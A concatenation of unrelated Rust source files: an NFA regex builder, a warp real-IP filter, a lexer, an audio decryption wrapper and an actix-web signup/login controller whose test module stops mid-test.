State::Branch(n1, n2)
},
}
}
}
#[derive(Debug, PartialEq, Clone)]
pub struct NFA {
states: Vec<State>,
}
impl NFA {
fn new() -> NFA { NFA { states: vec![State::Success] } }
fn with_char(c: ExpectedChar) -> NFA {
NFA { states: vec![ State::Success, State::NeedsCharacter(c, 0) ] }
}
fn char_st(c: char) -> NFA { NFA::with_char(ExpectedChar::Specific(c)) }
fn wildcard() -> NFA { NFA::with_char(ExpectedChar::Wildcard) }
fn any(chars: Vec<Character>) -> NFA { NFA::with_char(ExpectedChar::Any(chars)) }
fn none(chars: Vec<Character>) -> NFA { NFA::with_char(ExpectedChar::None(chars)) }
pub fn state_at<'a>(&'a self, at: usize) -> &'a State { &self.states[at] }
pub fn num_states(&self) -> usize { self.states.len() }
fn insert(&mut self, at: usize, st: State) {
self.states.insert(at, st);
self.states = self.states.iter().enumerate().map(|(i, s)| {
s.clone().offset_from(if i == at { at } else { at - 1 }, 1)
}).collect();
}
// Places all the exit points of self onto the beginning
// of other...
fn concat(self, other: NFA) -> NFA {
// Invariant: first state should be success state
assert_eq!(self.states[0], State::Success);
assert_eq!(other.states[0], State::Success);
// We concatenate the two vectors together, and then
// update all references of the second to be += first.len()
let off = other.states.len() - 1;
assert!(other.states.len() != 0);
self.states.iter().fold(other, |nfa, state| {
let s = state.clone();
match s {
State::Success => nfa,
_ => {
let mut new_nfa = nfa.clone();
new_nfa.states.push(s.offset(off));
new_nfa
}
}
})
}
pub fn remove_branches(&self, st: HashSet<usize>) -> HashSet<usize> {
let mut check_states: Vec<_> = st.clone().iter().map(|k| *k).collect();
let mut checked_states: HashSet<usize> = HashSet::new();
let mut branchless_states: HashSet<usize> = HashSet::new();
loop {
let st_idx = {
match check_states.pop() {
None => break,
Some(st) => st
}
};
match self.states[st_idx].clone() {
// We can consider some of these states as "empty"
State::NeedsCharacter(ExpectedChar::Any(chars), next) => {
if chars.is_empty() {
if !checked_states.contains(&next) {
check_states.push(next);
}
} else {
branchless_states.insert(st_idx);
}
},
State::NeedsCharacter(ExpectedChar::None(chars), next) => {
if chars.is_empty() {
if !checked_states.contains(&next) {
check_states.push(next);
}
} else {
branchless_states.insert(st_idx);
}
},
// We don't check for success here, but on the next loop
// iteration we should know that we can...
State::Branch(id1, id2) => {
if !checked_states.contains(&id1) {
check_states.push(id1);
}
if !checked_states.contains(&id2) {
check_states.push(id2);
}
},
_ => {
branchless_states.insert(st_idx);
}
}
checked_states.insert(st_idx);
}
branchless_states
}
}
pub fn build_nfa (expr: Expression) -> NFA {
match expr {
Expression::Char(c) => NFA::char_st(c),
Expression::Wildcard => NFA::wildcard(),
Expression::Any(chars) => NFA::any(chars),
Expression::None(chars) => NFA::none(chars),
Expression::All(exprs) => exprs.iter().fold(NFA::new(), |nfa, e| {
nfa.concat(build_nfa(e.clone()))
}),
Expression::Choice(e1, e2) => {
let mut e1_nfa = build_nfa(*e1);
let e2_nfa = build_nfa(*e2);
let n = e1_nfa.states.len();
let m = e2_nfa.states.len();
// Append each state in sequence, which is effectively a concat, but
// instead of the success state, we need to place an epsilon transition
// to the success state of the e1 nfa.
for s in e2_nfa.states {
if s == State::Success {
// !HACK! We need an epsilon transition here, but not necessarily
// a branch. A branch where both states end up in the same place
// is effectively a singular epsilon transition.
e1_nfa.states.push(State::branch(0, 0));
} else {
// Each of these states has 'n' states in front from the other nfa
e1_nfa.states.push(s.offset(n));
}
}
e1_nfa.states.push(State::branch(n - 1, n + m - 1));
e1_nfa
}
Expression::NoneOrMore(expr) => {
let mut expr_nfa = build_nfa(*expr);
let last_state_id = expr_nfa.states.len() - 1;
// Add the none branch
expr_nfa.states.push(State::branch(0, last_state_id));
// Add the more branch
expr_nfa.insert(1, State::branch(0, last_state_id));
expr_nfa
},
Expression::OneOrMore(expr) => {
let mut expr_nfa = build_nfa(*expr);
let last_state_id = expr_nfa.states.len() - 1;
// Add the more branch
expr_nfa.insert(1, State::branch(0, last_state_id));
expr_nfa
},
Expression::NoneOrOne(expr) => {
let mut expr_nfa = build_nfa(*expr);
let last_state_id = expr_nfa.states.len() - 1;
// Add the none branch
expr_nfa.states.push(State::branch(0, last_state_id));
expr_nfa
}
}
}
| true |
02e45dba705021a6f90302a79470f304d8150bac
|
Rust
|
icewind1991/warp-real-ip
|
/src/lib.rs
|
UTF-8
| 9,947 | 2.90625 | 3 |
[] |
no_license
|
use ipnetwork::IpNetwork;
use rfc7239::{parse, Forwarded, NodeIdentifier, NodeName};
use std::borrow::Cow;
use std::convert::Infallible;
use std::iter::{once, FromIterator, IntoIterator};
use std::net::{IpAddr, SocketAddr};
use std::str::FromStr;
use warp::filters::addr::remote;
use warp::Filter;
/// Represents a set of IP networks.
#[derive(Debug, Clone)]
pub struct IpNetworks {
networks: Vec<IpNetwork>,
}
impl IpNetworks {
/// Checks if addr is part of any IP networks included.
pub fn contains(&self, addr: &IpAddr) -> bool {
self.networks.iter().any(|&network| network.contains(*addr))
}
}
impl From<Vec<IpAddr>> for IpNetworks {
fn from(addrs: Vec<IpAddr>) -> Self {
addrs.into_iter().collect()
}
}
impl From<&[IpAddr]> for IpNetworks {
fn from(addrs: &[IpAddr]) -> Self {
addrs.iter().copied().collect()
}
}
impl FromIterator<IpAddr> for IpNetworks {
fn from_iter<T: IntoIterator<Item = IpAddr>>(addrs: T) -> Self {
addrs.into_iter().map(IpNetwork::from).collect()
}
}
impl FromIterator<IpNetwork> for IpNetworks {
fn from_iter<T: IntoIterator<Item = IpNetwork>>(addrs: T) -> Self {
IpNetworks {
networks: addrs.into_iter().collect(),
}
}
}
/// Creates a `Filter` that provides the "real ip" of the connected client.
///
/// This uses the "x-forwarded-for" or "x-real-ip" headers set by reverse proxies.
/// To stop clients from abusing these headers, only headers set by trusted remotes will be accepted.
///
/// Note that if multiple forwarded-for addresses are present, which can be the case when using nested reverse proxies,
/// all proxies in the chain have to be within the list of trusted proxies.
///
/// ## Example
///
/// ```no_run
/// use warp::Filter;
/// use warp_real_ip::real_ip;
/// use std::net::IpAddr;
///
/// let proxy_addr = [127, 10, 0, 1].into();
/// warp::any()
/// .and(real_ip(vec![proxy_addr]))
/// .map(|addr: Option<IpAddr>| format!("Hello {}", addr.unwrap()));
/// ```
pub fn real_ip(
trusted_proxies: impl Into<IpNetworks>,
) -> impl Filter<Extract = (Option<IpAddr>,), Error = Infallible> + Clone {
let trusted_proxies = trusted_proxies.into();
remote().and(get_forwarded_for()).map(
move |addr: Option<SocketAddr>, forwarded_for: Vec<IpAddr>| {
addr.map(|addr| {
let hops = forwarded_for.iter().copied().chain(once(addr.ip()));
for hop in hops.rev() {
if !trusted_proxies.contains(&hop) {
return hop;
}
}
// all hops were trusted, return the last one
forwarded_for.first().copied().unwrap_or_else(|| addr.ip())
})
},
)
}
/// Creates a `Filter` that extracts the ip addresses from the the "forwarded for" chain
pub fn get_forwarded_for() -> impl Filter<Extract = (Vec<IpAddr>,), Error = Infallible> + Clone {
warp::header("x-forwarded-for")
.map(|list: CommaSeparated<IpAddr>| list.into_inner())
.or(warp::header("x-real-ip").map(|ip: String| {
IpAddr::from_str(maybe_bracketed(&maybe_quoted(&ip)))
.map_or_else(|_| Vec::<IpAddr>::new(), |x| vec![x])
}))
.unify()
.or(warp::header("forwarded").map(|header: String| {
parse(&header)
.filter_map(|forward| match forward {
Ok(Forwarded {
forwarded_for:
Some(NodeIdentifier {
name: NodeName::Ip(ip),
..
}),
..
}) => Some(ip),
_ => None,
})
.collect::<Vec<_>>()
}))
.unify()
.or(warp::any().map(Vec::new))
.unify()
}
#[derive(Copy, Clone)]
enum CommaSeparatedIteratorState {
/// Start of string or after a ',' (including whitespace)
Default,
/// Inside a double quote
Quoted,
/// After escape character inside quote
QuotedPair,
/// Non quoted part
Token,
/// After closing double quote
PostAmbleForQuoted,
}
struct CommaSeparatedIterator<'a> {
/// target
target: &'a str,
/// iterator
char_indices: std::str::CharIndices<'a>,
/// current scanner state
state: CommaSeparatedIteratorState,
/// start position of the last token found
s: usize,
}
impl<'a> CommaSeparatedIterator<'a> {
pub fn new(target: &'a str) -> Self {
Self {
target,
char_indices: target.char_indices(),
state: CommaSeparatedIteratorState::Default,
s: 0,
}
}
}
impl<'a> Iterator for CommaSeparatedIterator<'a> {
type Item = &'a str;
fn next(&mut self) -> Option<Self::Item> {
for (i, c) in &mut self.char_indices {
let (next, next_state) = match (self.state, c) {
(CommaSeparatedIteratorState::Default, '"') => {
self.s = i;
(None, CommaSeparatedIteratorState::Quoted)
}
(CommaSeparatedIteratorState::Default, ' ' | '\t') => {
(None, CommaSeparatedIteratorState::Default)
}
(CommaSeparatedIteratorState::Default, ',') => (
Some(Some(&self.target[i..i])),
CommaSeparatedIteratorState::Default,
),
(CommaSeparatedIteratorState::Default, _) => {
self.s = i;
(None, CommaSeparatedIteratorState::Token)
}
(CommaSeparatedIteratorState::Quoted, '"') => (
Some(Some(&self.target[self.s..i + 1])),
CommaSeparatedIteratorState::PostAmbleForQuoted,
),
(CommaSeparatedIteratorState::Quoted, '\\') => {
(None, CommaSeparatedIteratorState::QuotedPair)
}
(CommaSeparatedIteratorState::QuotedPair, _) => {
(None, CommaSeparatedIteratorState::Quoted)
}
(CommaSeparatedIteratorState::Token, ',') => (
Some(Some(&self.target[self.s..i])),
CommaSeparatedIteratorState::Default,
),
(CommaSeparatedIteratorState::PostAmbleForQuoted, ',') => {
(None, CommaSeparatedIteratorState::Default)
}
(current_state, _) => (None, current_state),
};
self.state = next_state;
if let Some(next) = next {
return next;
}
}
match self.state {
CommaSeparatedIteratorState::Default
| CommaSeparatedIteratorState::PostAmbleForQuoted => None,
CommaSeparatedIteratorState::Quoted
| CommaSeparatedIteratorState::QuotedPair
| CommaSeparatedIteratorState::Token => {
self.state = CommaSeparatedIteratorState::Default;
Some(&self.target[self.s..])
}
}
}
}
enum EscapeState {
Normal,
Escaped,
}
fn maybe_quoted(x: &str) -> Cow<str> {
let mut i = x.chars();
if i.next() == Some('"') {
let mut s = String::with_capacity(x.len());
let mut state = EscapeState::Normal;
for c in i {
state = match state {
EscapeState::Normal => match c {
'"' => break,
'\\' => EscapeState::Escaped,
_ => {
s.push(c);
EscapeState::Normal
}
},
EscapeState::Escaped => {
s.push(c);
EscapeState::Normal
}
};
}
s.into()
} else {
x.into()
}
}
fn maybe_bracketed(x: &str) -> &str {
if x.as_bytes().first() == Some(&b'[') && x.as_bytes().last() == Some(&b']') {
&x[1..x.len() - 1]
} else {
x
}
}
/// Newtype so we can implement FromStr
struct CommaSeparated<T>(Vec<T>);
impl<T> CommaSeparated<T> {
pub fn into_inner(self) -> Vec<T> {
self.0
}
}
impl<T: FromStr> FromStr for CommaSeparated<T> {
type Err = T::Err;
fn from_str(s: &str) -> Result<Self, Self::Err> {
let vec = CommaSeparatedIterator::new(s)
.map(|x| T::from_str(maybe_bracketed(&maybe_quoted(x.trim()))))
.collect::<Result<Vec<_>, _>>()?;
Ok(CommaSeparated(vec))
}
}
#[cfg(test)]
mod tests {
use crate::{maybe_bracketed, maybe_quoted, CommaSeparatedIterator};
#[test]
fn test_comma_separated_iterator() {
assert_eq!(
vec!["abc", "def", "ghi", "jkl ", "mno", "pqr"],
CommaSeparatedIterator::new("abc,def, ghi,\tjkl , mno,\tpqr").collect::<Vec<&str>>()
);
assert_eq!(
vec![
"abc",
"\"def\"",
"\"ghi\"",
"\"jkl\"",
"\"mno\"",
"pqr",
"\"abc, def\"",
],
CommaSeparatedIterator::new(
"abc,\"def\", \"ghi\",\t\"jkl\" , \"mno\",\tpqr, \"abc, def\""
)
.collect::<Vec<&str>>()
);
}
#[test]
fn test_maybe_quoted() {
assert_eq!("abc", maybe_quoted("abc"));
assert_eq!("abc", maybe_quoted("\"abc\""));
assert_eq!("a\"bc", maybe_quoted("\"a\\\"bc\""));
}
#[test]
fn test_maybe_bracketed() {
assert_eq!("abc", maybe_bracketed("abc"));
assert_eq!("abc", maybe_bracketed("[abc]"));
assert_eq!("[abc", maybe_bracketed("[abc"));
assert_eq!("abc]", maybe_bracketed("abc]"));
}
}
| true |
3999b71803bfe31daa051cd06351a5a1f95f5b38
|
Rust
|
kokeshiM0chi/BlockMaze
|
/libsnark-hdsnark/src/subgadget/gen_data/gen_sha256_two_block_data/main.rs
|
UTF-8
| 1,147 | 2.6875 | 3 |
[
"MIT"
] |
permissive
|
#![feature(rustc_private)]
extern crate rustc;
use rustc::util::sha2::{Digest,Sha256};
//use std::u8;
//use self::Test::*;
fn main() {
println!("valid: ");
gen();
}
fn gen() {
let v: Vec<u8> = vec![3, 0, 0, 0, 0, 0, 0, 0];
let sn: Vec<u8> = vec![1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];
let r: Vec<u8> = vec![1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];
let h: Vec<u8> = {
let mut hash = Sha256::new();
hash.input(&v);
hash.input(&sn);
hash.input(&r);
hash.result_bytes()
};
print!("hash_bv = int_list_to_bits("); into_bin(&h);
print!("v_data_bv = int_list_to_bits("); into_bin(&v);
print!("sn_data_bv = int_list_to_bits("); into_bin(&sn);
print!("r_data_bv = int_list_to_bits("); into_bin(&r);
}
fn into_bin(a: &Vec<u8>) {
let mut first = true;
print!("{{");
for a in a.iter() {
print!("{}{}",
{if !first { ", " } else {first = false; ""}},
a
);
}
println!("}}, 8);");
}
| true |
2f5743d779ae38526bff2434a91a78666af5bfd3
|
Rust
|
mbrook22yr/logos
|
/logos/src/lexer.rs
|
UTF-8
| 5,022 | 3.3125 | 3 |
[
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
use std::ops::Range;
use crate::source::{Source, ByteArray};
use super::{Logos};
use super::internal::LexerInternal;
/// A Lookup Table used internally. It maps indices for every valid
/// byte to a function that takes a mutable reference to the `Lexer`,
/// reads the input and sets the correct token variant for it.
pub type Lexicon<Lexer> = [Option<fn(&mut Lexer)>; 256];
/// `Lexer` is the main struct of the crate that allows you to read through a
/// `Source` and produce tokens for enums implementing the `Logos` trait.
pub struct Lexer<Token: Logos, Source> {
/// Source from which the Lexer is reading tokens.
pub source: Source,
/// Current token. Call the `advance` method to get a new token.
pub token: Token,
/// Extras associated with the `Token`.
pub extras: Token::Extras,
token_start: usize,
token_end: usize,
}
macro_rules! unroll {
($( $code:tt )*) => (
$( $code )*
$( $code )*
$( $code )*
$( $code )*
loop {
$( $code )*
}
)
}
impl<'source, Token, Source> Lexer<Token, Source>
where
Token: self::Logos,
Source: self::Source<'source>,
{
/// Create a new `Lexer`.
///
/// Due to type inference, it might be more ergonomic to construct
/// it by calling `Token::lexer(source)`, where `Token` implements `Logos`.
pub fn new(source: Source) -> Self {
let mut lex = Lexer {
source,
token: Token::ERROR,
extras: Default::default(),
token_start: 0,
token_end: 0,
};
lex.advance();
lex
}
/// Advance the `Lexer` and attempt to produce the next `Token`.
pub fn advance(&mut self) {
let mut ch;
self.extras.on_advance();
unroll! {
ch = self.read();
if let Some(handler) = Token::lexicon()[ch as usize] {
self.token_start = self.token_end;
return handler(self);
}
self.extras.on_whitespace(ch);
self.bump(1);
}
}
/// Get the range for the current token in `Source`.
#[inline]
pub fn range(&self) -> Range<usize> {
self.token_start .. self.token_end
}
/// Get a string slice of the current token.
#[inline]
pub fn slice(&self) -> Source::Slice {
unsafe { self.source.slice_unchecked(self.range()) }
}
}
/// Helper trait that can be injected into the `Lexer` to handle things that
/// aren't necessarily tokens, such as comments or Automatic Semicolon Insertion
/// in JavaScript.
pub trait Extras: Sized + Default {
/// Method called by the `Lexer` when a new token is about to be produced.
#[inline]
fn on_advance(&mut self) {}
/// Method called by the `Lexer` when a white space byte has been encountered.
#[inline]
fn on_whitespace(&mut self, _byte: u8) {}
}
/// Default `Extras` with no logic
impl Extras for () { }
#[doc(hidden)]
/// # WARNING!
///
/// **This trait, and it's methods, are not meant to be used outside of the
/// code produced by `#[derive(Logos)]` macro.**
impl<'source, Token, Source> LexerInternal<'source> for Lexer<Token, Source>
where
Token: self::Logos,
Source: self::Source<'source>,
{
/// Read a byte at current position of the `Lexer`. If end
/// of the `Source` has been reached, this will return `0`.
///
/// # WARNING!
///
/// This should never be called as public API, and is instead
/// meant to be called by the implementor of the `Logos` trait.
#[inline]
fn read(&self) -> u8 {
unsafe { self.source.read(self.token_end) }
}
#[inline]
fn read_bytes<Array>(&self) -> Option<&'source Array>
where
Array: ByteArray<'source>
{
self.source.read_bytes(self.token_end)
}
/// Convenience method that bumps the position `Lexer` is
/// reading from and then reads the following byte.
///
/// # WARNING!
///
/// This should never be called as public API, and is instead
/// meant to be called by the implementor of the `Logos` trait.
///
/// **If the end position has been reached, further bumps
/// can lead to undefined behavior!**
///
/// **This method will panic in debug mode if that happens!**
#[inline]
fn next(&mut self) -> u8 {
self.bump(1);
self.read()
}
/// Bump the position `Lexer` is reading from by `1`.
///
/// # WARNING!
///
/// This should never be called as public API, and is instead
/// meant to be called by the implementor of the `Logos` trait.
///
/// **If the end position has been reached, further bumps
/// can lead to undefined behavior!**
///
/// **This method will panic in debug mode if that happens!**
#[inline]
fn bump(&mut self, size: usize) {
debug_assert!(self.token_end + size <= self.source.len(), "Bumping out of bounds!");
self.token_end += size;
}
}
| true |
5633aec609cd0a4dfe0fe96e74a0afff8b6cdf30
|
Rust
|
librespot-org/librespot
|
/audio/src/decrypt.rs
|
UTF-8
| 1,424 | 2.515625 | 3 |
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
use std::io;
use aes::cipher::{KeyIvInit, StreamCipher, StreamCipherSeek};
type Aes128Ctr = ctr::Ctr128BE<aes::Aes128>;
use librespot_core::audio_key::AudioKey;
const AUDIO_AESIV: [u8; 16] = [
0x72, 0xe0, 0x67, 0xfb, 0xdd, 0xcb, 0xcf, 0x77, 0xeb, 0xe8, 0xbc, 0x64, 0x3f, 0x63, 0x0d, 0x93,
];
pub struct AudioDecrypt<T: io::Read> {
// a `None` cipher is a convenience to make `AudioDecrypt` pass files unaltered
cipher: Option<Aes128Ctr>,
reader: T,
}
impl<T: io::Read> AudioDecrypt<T> {
pub fn new(key: Option<AudioKey>, reader: T) -> AudioDecrypt<T> {
let cipher = if let Some(key) = key {
Aes128Ctr::new_from_slices(&key.0, &AUDIO_AESIV).ok()
} else {
// some files are unencrypted
None
};
AudioDecrypt { cipher, reader }
}
}
impl<T: io::Read> io::Read for AudioDecrypt<T> {
fn read(&mut self, output: &mut [u8]) -> io::Result<usize> {
let len = self.reader.read(output)?;
if let Some(ref mut cipher) = self.cipher {
cipher.apply_keystream(&mut output[..len]);
}
Ok(len)
}
}
impl<T: io::Read + io::Seek> io::Seek for AudioDecrypt<T> {
fn seek(&mut self, pos: io::SeekFrom) -> io::Result<u64> {
let newpos = self.reader.seek(pos)?;
if let Some(ref mut cipher) = self.cipher {
cipher.seek(newpos);
}
Ok(newpos)
}
}
| true |
b8346deb7316b113c53448619cddcaf39a889e7b
|
Rust
|
SakaDream/actix-web-rest-api-with-jwt
|
/src/api/account_controller.rs
|
UTF-8
| 17,293 | 2.515625 | 3 |
[
"MIT"
] |
permissive
|
use actix_web::{web, HttpRequest, HttpResponse};
use crate::{
config::db::Pool,
constants,
error::ServiceError,
models::{
response::ResponseBody,
user::{LoginDTO, UserDTO},
},
services::account_service,
};
// POST api/auth/signup
pub async fn signup(
user_dto: web::Json<UserDTO>,
pool: web::Data<Pool>,
) -> Result<HttpResponse, ServiceError> {
match account_service::signup(user_dto.0, &pool) {
Ok(message) => Ok(HttpResponse::Ok().json(ResponseBody::new(&message, constants::EMPTY))),
Err(err) => Err(err),
}
}
// POST api/auth/login
pub async fn login(
login_dto: web::Json<LoginDTO>,
pool: web::Data<Pool>,
) -> Result<HttpResponse, ServiceError> {
match account_service::login(login_dto.0, &pool) {
Ok(token_res) => Ok(HttpResponse::Ok().json(ResponseBody::new(
constants::MESSAGE_LOGIN_SUCCESS,
token_res,
))),
Err(err) => Err(err),
}
}
// POST api/auth/logout
pub async fn logout(req: HttpRequest, pool: web::Data<Pool>) -> Result<HttpResponse, ServiceError> {
if let Some(authen_header) = req.headers().get(constants::AUTHORIZATION) {
account_service::logout(authen_header, &pool);
Ok(HttpResponse::Ok().json(ResponseBody::new(
constants::MESSAGE_LOGOUT_SUCCESS,
constants::EMPTY,
)))
} else {
Err(ServiceError::BadRequest {
error_message: constants::MESSAGE_TOKEN_MISSING.to_string(),
})
}
}
// GET api/auth/me
pub async fn me(req: HttpRequest, pool: web::Data<Pool>) -> Result<HttpResponse, ServiceError> {
if let Some(authen_header) = req.headers().get(constants::AUTHORIZATION) {
match account_service::me(authen_header, &pool) {
Ok(login_info) => Ok(HttpResponse::Ok().json(ResponseBody::new(constants::MESSAGE_OK, login_info))),
Err(err) => Err(err),
}
} else {
Err(ServiceError::BadRequest {
error_message: constants::MESSAGE_TOKEN_MISSING.to_string(),
})
}
}
#[cfg(test)]
mod tests {
use actix_cors::Cors;
use actix_web::dev::Service;
use actix_web::web;
use actix_web::{http, http::StatusCode, test};
use futures::FutureExt;
use http::header;
use testcontainers::clients;
use testcontainers::images::postgres::Postgres;
use crate::{config, App};
#[actix_web::test]
async fn test_signup_ok() {
let docker = clients::Cli::default();
let postgres = docker.run(Postgres::default());
let pool = config::db::init_db_pool(
format!(
"postgres://postgres:[email protected]:{}/postgres",
postgres.get_host_port_ipv4(5432)
)
.as_str(),
);
config::db::run_migration(&mut pool.get().unwrap());
let app = test::init_service(
App::new()
.wrap(
Cors::default()
.send_wildcard()
.allowed_methods(vec!["GET", "POST", "PUT", "DELETE"])
.allowed_header(http::header::CONTENT_TYPE)
.max_age(3600),
)
.app_data(web::Data::new(pool.clone()))
.wrap(actix_web::middleware::Logger::default())
.wrap(crate::middleware::auth_middleware::Authentication)
.wrap_fn(|req, srv| srv.call(req).map(|res| res))
.configure(crate::config::app::config_services),
)
.await;
let resp = test::TestRequest::post()
.uri("/api/auth/signup")
.insert_header(header::ContentType::json())
.set_payload(
r#"{"username":"admin","email":"[email protected]","password":"123456"}"#.as_bytes(),
)
.send_request(&app)
.await;
// let data = test::read_body(resp).await;
// println!("{:#?}", &data);
assert_eq!(resp.status(), StatusCode::OK);
}
#[actix_web::test]
async fn test_signup_duplicate_user() {
let docker = clients::Cli::default();
let postgres = docker.run(Postgres::default());
let pool = config::db::init_db_pool(
format!(
"postgres://postgres:[email protected]:{}/postgres",
postgres.get_host_port_ipv4(5432)
)
.as_str(),
);
config::db::run_migration(&mut pool.get().unwrap());
let app = test::init_service(
App::new()
.wrap(
Cors::default()
.send_wildcard()
.allowed_methods(vec!["GET", "POST", "PUT", "DELETE"])
.allowed_header(header::CONTENT_TYPE)
.max_age(3600),
)
.app_data(web::Data::new(pool.clone()))
.wrap(actix_web::middleware::Logger::default())
.wrap(crate::middleware::auth_middleware::Authentication)
.wrap_fn(|req, srv| srv.call(req).map(|res| res))
.configure(crate::config::app::config_services),
)
.await;
test::TestRequest::post()
.uri("/api/auth/signup")
.insert_header(header::ContentType::json())
.set_payload(
r#"{"username":"admin","email":"[email protected]","password":"123456"}"#.as_bytes(),
)
.send_request(&app)
.await;
let resp = test::TestRequest::post()
.uri("/api/auth/signup")
.insert_header(header::ContentType::json())
.set_payload(
r#"{"username":"admin","email":"[email protected]","password":"123456"}"#.as_bytes(),
)
.send_request(&app)
.await;
// let data = test::read_body(resp).await;
// println!("{:#?}", &data);
assert_eq!(resp.status(), StatusCode::BAD_REQUEST);
}
#[actix_web::test]
async fn test_login_ok_with_username() {
let docker = clients::Cli::default();
let postgres = docker.run(Postgres::default());
let pool = config::db::init_db_pool(
format!(
"postgres://postgres:[email protected]:{}/postgres",
postgres.get_host_port_ipv4(5432)
)
.as_str(),
);
config::db::run_migration(&mut pool.get().unwrap());
let app = test::init_service(
App::new()
.wrap(
Cors::default()
.send_wildcard()
.allowed_methods(vec!["GET", "POST", "PUT", "DELETE"])
.allowed_header(http::header::CONTENT_TYPE)
.max_age(3600),
)
.app_data(web::Data::new(pool.clone()))
.wrap(actix_web::middleware::Logger::default())
.wrap(crate::middleware::auth_middleware::Authentication)
.wrap_fn(|req, srv| srv.call(req).map(|res| res))
.configure(crate::config::app::config_services),
)
.await;
test::TestRequest::post()
.uri("/api/auth/signup")
.insert_header(header::ContentType::json())
.set_payload(
r#"{"username":"admin","email":"[email protected]","password":"123456"}"#.as_bytes(),
)
.send_request(&app)
.await;
let resp = test::TestRequest::post()
.uri("/api/auth/login")
.insert_header(header::ContentType::json())
.set_payload(r#"{"username_or_email":"admin","password":"123456"}"#.as_bytes())
.send_request(&app)
.await;
assert_eq!(resp.status(), StatusCode::OK);
}
#[actix_web::test]
async fn test_login_ok_with_email() {
let docker = clients::Cli::default();
let postgres = docker.run(Postgres::default());
let pool = config::db::init_db_pool(
format!(
"postgres://postgres:[email protected]:{}/postgres",
postgres.get_host_port_ipv4(5432)
)
.as_str(),
);
config::db::run_migration(&mut pool.get().unwrap());
let app = test::init_service(
App::new()
.wrap(
Cors::default()
.send_wildcard()
.allowed_methods(vec!["GET", "POST", "PUT", "DELETE"])
.allowed_header(http::header::CONTENT_TYPE)
.max_age(3600),
)
.app_data(web::Data::new(pool.clone()))
.wrap(actix_web::middleware::Logger::default())
.wrap(crate::middleware::auth_middleware::Authentication)
.wrap_fn(|req, srv| srv.call(req).map(|res| res))
.configure(crate::config::app::config_services),
)
.await;
test::TestRequest::post()
.uri("/api/auth/signup")
.insert_header(header::ContentType::json())
.set_payload(
r#"{"username":"admin","email":"[email protected]","password":"123456"}"#.as_bytes(),
)
.send_request(&app)
.await;
let resp = test::TestRequest::post()
.uri("/api/auth/login")
.insert_header(header::ContentType::json())
.set_payload(
r#"{"username_or_email":"[email protected]","password":"123456"}"#.as_bytes(),
)
.send_request(&app)
.await;
assert_eq!(resp.status(), StatusCode::OK);
}
#[actix_web::test]
async fn test_login_password_incorrect_with_username() {
let docker = clients::Cli::default();
let postgres = docker.run(Postgres::default());
let pool = config::db::init_db_pool(
format!(
"postgres://postgres:[email protected]:{}/postgres",
postgres.get_host_port_ipv4(5432)
)
.as_str(),
);
config::db::run_migration(&mut pool.get().unwrap());
let app = test::init_service(
App::new()
.wrap(
Cors::default()
.send_wildcard()
.allowed_methods(vec!["GET", "POST", "PUT", "DELETE"])
.allowed_header(http::header::CONTENT_TYPE)
.max_age(3600),
)
.app_data(web::Data::new(pool.clone()))
.wrap(actix_web::middleware::Logger::default())
.wrap(crate::middleware::auth_middleware::Authentication)
.wrap_fn(|req, srv| srv.call(req).map(|res| res))
.configure(crate::config::app::config_services),
)
.await;
test::TestRequest::post()
.uri("/api/auth/signup")
.insert_header(header::ContentType::json())
.set_payload(
r#"{"username":"admin","email":"[email protected]","password":"123456"}"#.as_bytes(),
)
.send_request(&app)
.await;
let resp = test::TestRequest::post()
.uri("/api/auth/login")
.insert_header(header::ContentType::json())
.set_payload(r#"{"username_or_email":"admin","password":"password"}"#.as_bytes())
.send_request(&app)
.await;
assert_eq!(resp.status(), StatusCode::UNAUTHORIZED);
}
#[actix_web::test]
async fn test_login_password_incorrect_with_email() {
let docker = clients::Cli::default();
let postgres = docker.run(Postgres::default());
let pool = config::db::init_db_pool(
format!(
"postgres://postgres:[email protected]:{}/postgres",
postgres.get_host_port_ipv4(5432)
)
.as_str(),
);
config::db::run_migration(&mut pool.get().unwrap());
let app = test::init_service(
App::new()
.wrap(
Cors::default()
.send_wildcard()
.allowed_methods(vec!["GET", "POST", "PUT", "DELETE"])
.allowed_header(http::header::CONTENT_TYPE)
.max_age(3600),
)
.app_data(web::Data::new(pool.clone()))
.wrap(actix_web::middleware::Logger::default())
.wrap(crate::middleware::auth_middleware::Authentication)
.wrap_fn(|req, srv| srv.call(req).map(|res| res))
.configure(crate::config::app::config_services),
)
.await;
test::TestRequest::post()
.uri("/api/auth/signup")
.insert_header(header::ContentType::json())
.set_payload(
r#"{"username":"admin","email":"[email protected]","password":"123456"}"#.as_bytes(),
)
.send_request(&app)
.await;
let resp = test::TestRequest::post()
.uri("/api/auth/login")
.insert_header(header::ContentType::json())
.set_payload(
r#"{"username_or_email":"[email protected]","password":"password"}"#.as_bytes(),
)
.send_request(&app)
.await;
assert_eq!(resp.status(), StatusCode::UNAUTHORIZED);
}
#[actix_web::test]
async fn test_login_user_not_found_with_username() {
let docker = clients::Cli::default();
let postgres = docker.run(Postgres::default());
let pool = config::db::init_db_pool(
format!(
"postgres://postgres:[email protected]:{}/postgres",
postgres.get_host_port_ipv4(5432)
)
.as_str(),
);
config::db::run_migration(&mut pool.get().unwrap());
let app = test::init_service(
App::new()
.wrap(
Cors::default()
.send_wildcard()
.allowed_methods(vec!["GET", "POST", "PUT", "DELETE"])
.allowed_header(http::header::CONTENT_TYPE)
.max_age(3600),
)
.app_data(web::Data::new(pool.clone()))
.wrap(actix_web::middleware::Logger::default())
.wrap(crate::middleware::auth_middleware::Authentication)
.wrap_fn(|req, srv| srv.call(req).map(|res| res))
.configure(crate::config::app::config_services),
)
.await;
test::TestRequest::post()
.uri("/api/auth/signup")
.insert_header(header::ContentType::json())
.set_payload(
r#"{"username":"admin","email":"[email protected]","password":"password"}"#
.as_bytes(),
)
.send_request(&app)
.await;
let resp = test::TestRequest::post()
.uri("/api/auth/login")
.insert_header(header::ContentType::json())
.set_payload(r#"{"username_or_email":"abc","password":"123456"}"#.as_bytes())
.send_request(&app)
.await;
assert_eq!(resp.status(), StatusCode::UNAUTHORIZED);
}
#[actix_web::test]
